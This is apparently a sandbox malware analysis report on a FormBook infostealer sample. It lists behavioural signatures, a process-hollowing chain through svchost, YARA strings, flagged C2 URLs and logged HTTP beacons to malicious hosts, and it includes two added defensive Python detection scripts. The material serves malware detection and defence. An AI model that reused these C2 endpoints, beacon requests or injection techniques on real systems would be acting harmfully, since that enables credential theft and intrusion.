Windows Analysis Report
opp46lGmxd.exe

Overview

General Information

Sample name: opp46lGmxd.exe (renamed because the original name is a hash value)
Original sample name: 0f399d1b3a7c6dd28867095c2bdb2098.exe
Analysis ID: 1454256
MD5: 0f399d1b3a7c6dd28867095c2bdb2098
SHA1: ad22ee54a3f642a81ff9f48fbaba9af1f39c79b8
SHA256: a49d396f7f272b32af4ef12abb52d5bc92ff2c97ca09b1d79436e13f1b9bf192
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Switches to a custom stack to bypass stack traces
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • opp46lGmxd.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\opp46lGmxd.exe" MD5: 0F399D1B3A7C6DD28867095C2BDB2098)
    • svchost.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\opp46lGmxd.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • hKABgfptdlPzDLVJYF.exe (PID: 924 cmdline: "C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7692 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • hKABgfptdlPzDLVJYF.exe (PID: 6576 cmdline: "C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(table truncated; the full report lists 11 entries)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
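The two Windows_Trojan_Formbook_1112e116 strings listed above ($a2 and $a3) are plain byte sequences with no wildcards, so they can be re-checked outside the sandbox against any memory dump or unpacked PE. The following Python is an added example, not code from the report or from the rule's author: it scans a buffer for both strings and, because the signature list flags the binary as a likely compiled AutoIt script, also for the AutoIt3 compiled-script header "AU3!EA06" (public format knowledge, not something the report states). The sample buffer is constructed so that the hits land at known offsets, and the two-string threshold is this example's own, not the YARA rule's condition.

```python
"""Replay the Windows_Trojan_Formbook_1112e116 strings $a2/$a3 and the AutoIt3
compiled-script header against a buffer. Added example; see the lead-in."""
import re

# $a2 and $a3 exactly as listed in the report (plain hex, no wildcards).
FORMBOOK_STRINGS = {
    "$a2": bytes.fromhex("74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55"),
    "$a3": bytes.fromhex("1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01"),
}
# Header AutoIt3 places in front of an embedded compiled script (public
# format knowledge, not stated in the report).
AUTOIT_SCRIPT_MAGIC = b"AU3!EA06"


def find_offsets(buf: bytes, needle: bytes) -> list:
    """Every offset at which needle occurs in buf, overlapping hits included."""
    return [m.start() for m in re.finditer(b"(?=" + re.escape(needle) + b")", buf)]


def triage(buf: bytes, min_strings: int = 2) -> dict:
    """Summarise FormBook string hits and the AutoIt marker for one buffer.
    min_strings is this example's own threshold, not the YARA rule's condition."""
    hits = {name: find_offsets(buf, pat) for name, pat in FORMBOOK_STRINGS.items()}
    matched = {name: offs for name, offs in hits.items() if offs}
    return {
        "formbook_strings": matched,
        "formbook_suspect": len(matched) >= min_strings,
        "autoit_compiled": bool(find_offsets(buf, AUTOIT_SCRIPT_MAGIC)),
    }


def triage_file(path: str) -> dict:
    """Run triage over a file on disk (an .sdmp dump or an unpacked PE)."""
    with open(path, "rb") as fh:
        return triage(fh.read())


# Constructed buffer, not the sample: filler, $a2 at 0x102, filler, $a3 at
# 0x156, filler, then the AutoIt header at 0x17a.
SAMPLE_DUMP = (b"MZ" + b"\x90" * 0x100
               + FORMBOOK_STRINGS["$a2"] + b"\x00" * 0x40
               + FORMBOOK_STRINGS["$a3"] + b"\xcc" * 0x10
               + AUTOIT_SCRIPT_MAGIC)

if __name__ == "__main__":
    import sys
    result = triage_file(sys.argv[1]) if len(sys.argv) > 1 else triage(SAMPLE_DUMP)
    for key, value in result.items():
        print(f"{key}: {value}")
```

With yara-python and the rule set installed, yara.compile() evaluates the rule's real condition; this block only replays the two strings the report prints, so treat formbook_suspect as a triage hint, not as the rule's verdict.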

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\opp46lGmxd.exe", CommandLine: "C:\Users\user\Desktop\opp46lGmxd.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\opp46lGmxd.exe", ParentImage: C:\Users\user\Desktop\opp46lGmxd.exe, ParentProcessId: 7528, ParentProcessName: opp46lGmxd.exe, ProcessCommandLine: "C:\Users\user\Desktop\opp46lGmxd.exe", ProcessId: 7584, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\opp46lGmxd.exe", CommandLine: "C:\Users\user\Desktop\opp46lGmxd.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\opp46lGmxd.exe", ParentImage: C:\Users\user\Desktop\opp46lGmxd.exe, ParentProcessId: 7528, ParentProcessName: opp46lGmxd.exe, ProcessCommandLine: "C:\Users\user\Desktop\opp46lGmxd.exe", ProcessId: 7584, ProcessName: svchost.exe
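Both Sigma hits describe the same event: svchost.exe (PID 7584) started by opp46lGmxd.exe (PID 7528) with the parent's own command line instead of a real svchost command line, which is what a suspended-then-hollowed svchost looks like in process-creation telemetry. The following Python is an added example, not the Sigma rules themselves: it applies the same two checks (unexpected parent, command line naming a different executable) plus an image-path check to constructed events, one mirroring the report's data and one benign service host. The parent allow-list is a shortened, hypothetical version of what such a rule carries.

```python
"""Flag svchost.exe launches whose parent is unexpected or whose command line
names a different executable. Added example; see the lead-in."""
import ntpath

# Parents from which svchost.exe is normally started. Hypothetical, shortened
# allow-list; a production rule carries a fuller one.
EXPECTED_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def exe_name(path_or_cmdline: str) -> str:
    """Lower-cased base name of a path, or of the executable token of a
    command line ('"C:\\x\\a.exe" -k foo' -> 'a.exe')."""
    s = path_or_cmdline.strip()
    s = s[1:].split('"', 1)[0] if s.startswith('"') else s.split(" ", 1)[0]
    return ntpath.basename(s).lower()


def check_svchost_event(ev: dict) -> list:
    """Reasons a process-creation event looks like a hollowed or mis-parented
    svchost.exe; an empty list means the event is unremarkable."""
    reasons = []
    image = exe_name(ev["Image"])
    if image != "svchost.exe":
        return reasons
    parent = exe_name(ev["ParentImage"])
    if parent not in EXPECTED_SVCHOST_PARENTS:
        reasons.append(f"uncommon svchost parent {parent} (pid {ev['ParentProcessId']})")
    cmd_exe = exe_name(ev["CommandLine"])
    if cmd_exe != image:
        reasons.append(f"command line names {cmd_exe} but image is {image}")
    if not ev["Image"].lower().startswith(SYSTEM_DIRS):
        reasons.append(f"svchost.exe outside System32/SysWOW64: {ev['Image']}")
    return reasons


def scan_events(events) -> dict:
    """Map ProcessId -> reasons for every event that triggers."""
    out = {}
    for ev in events:
        reasons = check_svchost_event(ev)
        if reasons:
            out[ev["ProcessId"]] = reasons
    return out


# Constructed events. The first mirrors the Sigma data in the report
# (svchost.exe PID 7584 launched by opp46lGmxd.exe PID 7528, command line
# copied from the parent); the second is an ordinary service host.
SAMPLE_EVENTS = [
    {"ProcessId": 7584, "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\opp46lGmxd.exe"',
     "ParentProcessId": 7528, "ParentImage": r"C:\Users\user\Desktop\opp46lGmxd.exe"},
    {"ProcessId": 1234, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
     "ParentProcessId": 700, "ParentImage": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for pid, reasons in scan_events(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

The command-line check is the one that survives a better-behaved injector: a loader that launches svchost.exe from a whitelisted parent still has to hand CreateProcess a command line, and when that command line is the loader's own path the mismatch with the image name is visible in Sysmon Event ID 1 or Security 4688 without any memory inspection.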
            No Snort rule has matched

            AV Detection

Source: opp46lGmxd.exe | Avira: detected
Source: http://www.660danm.top/fo8o/?Zl4h1=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/DTXti4BJBda4ZDKyYIpNZZRE2pdJDqsa0=&Pbw=PLVXbnG85 | Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com/fo8o/?Zl4h1=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&Pbw=PLVXbnG85 | Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com/fo8o/ | Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/ | Avira URL Cloud: Label: malware
Source: http://www.magmadokum.com/fo8o/ | Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/ | Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/?Zl4h1=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOn9Eslw/yPbbhzQEQvbg5EH2R2vQNh194=&Pbw=PLVXbnG85 | Avira URL Cloud: Label: malware
Source: http://www.magmadokum.com/fo8o/?Zl4h1=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk=&Pbw=PLVXbnG85 | Avira URL Cloud: Label: malware
Source: http://www.shenzhoucui.com/fo8o/ | Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/ | Avira URL Cloud: Label: malware
Source: http://www.shenzhoucui.com/fo8o/?Zl4h1=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBCxUtCWRaVQIS6dSVAag1St1hJr7Wk88RO5I=&Pbw=PLVXbnG85 | Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?Zl4h1=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE=&Pbw=PLVXbnG85 | Avira URL Cloud: Label: malware
Source: https://www.empowermedeco.com/fo8o/?Zl4h1=mxnR | Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/ | Avira URL Cloud: Label: phishing
Source: opp46lGmxd.exe | ReversingLabs: Detection: 57%
Source: opp46lGmxd.exe | Virustotal: Detection: 67%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: opp46lGmxd.exe | Joe Sandbox ML: detected
Source: opp46lGmxd.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: hKABgfptdlPzDLVJYF.exe, 00000003.00000002.3851208680.0000000000B4E000.00000002.00000001.01000000.00000004.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000000.1613457617.0000000000B4E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: opp46lGmxd.exe, 00000000.00000003.1387288056.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, opp46lGmxd.exe, 00000000.00000003.1384841864.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1443750275.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445609294.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3854578563.0000000003990000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1539597721.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3854578563.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1536856304.0000000003621000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: opp46lGmxd.exe, 00000000.00000003.1387288056.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, opp46lGmxd.exe, 00000000.00000003.1384841864.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1443750275.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445609294.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.3854578563.0000000003990000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1539597721.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3854578563.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1536856304.0000000003621000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb | source: svchost.exe, 00000002.00000002.1536640722.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1505651031.000000000341A000.00000004.00000020.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000003.1476557144.0000000000BEB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: netbtugc.exe, 00000004.00000002.3848803016.000000000352E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3855652610.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1840693063.000000002EBAC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: netbtugc.exe, 00000004.00000002.3848803016.000000000352E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3855652610.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1840693063.000000002EBAC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL | source: svchost.exe, 00000002.00000002.1536640722.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1505651031.000000000341A000.00000004.00000020.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000003.1476557144.0000000000BEB000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AC4696 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00ACC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00ACC93C FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00ACF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00ACF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00ACF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AC3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AC3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00ACBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_032ABAB0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then xor eax, eax | 4_2_03299480
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then pop edi | 4_2_0329DD45
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then mov ebx, 00000004h | 4_2_0388053E

            Networking

            Source: DNS query: www.joyesi.xyz
Source: unknown | Network traffic detected: IP country count 11
Source: Joe Sandbox View | IP Address: 91.195.240.94
Source: Joe Sandbox View | IP Address: 116.50.37.244
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (16 occurrences)
Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AD25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.3xfootball.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOn9Eslw/yPbbhzQEQvbg5EH2R2vQNh194=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.kasegitai.tokyo | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.goldenjade-travel.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGR60o0iKF2B/qr8s1uSeS9C8wWF5VDipMs=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.antonio-vivaldi.mobi | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.magmadokum.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic | HTTP traffic detected: GET /fo8o/?Zl4h1=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&Pbw=PLVXbnG85 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.rssnewscast.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
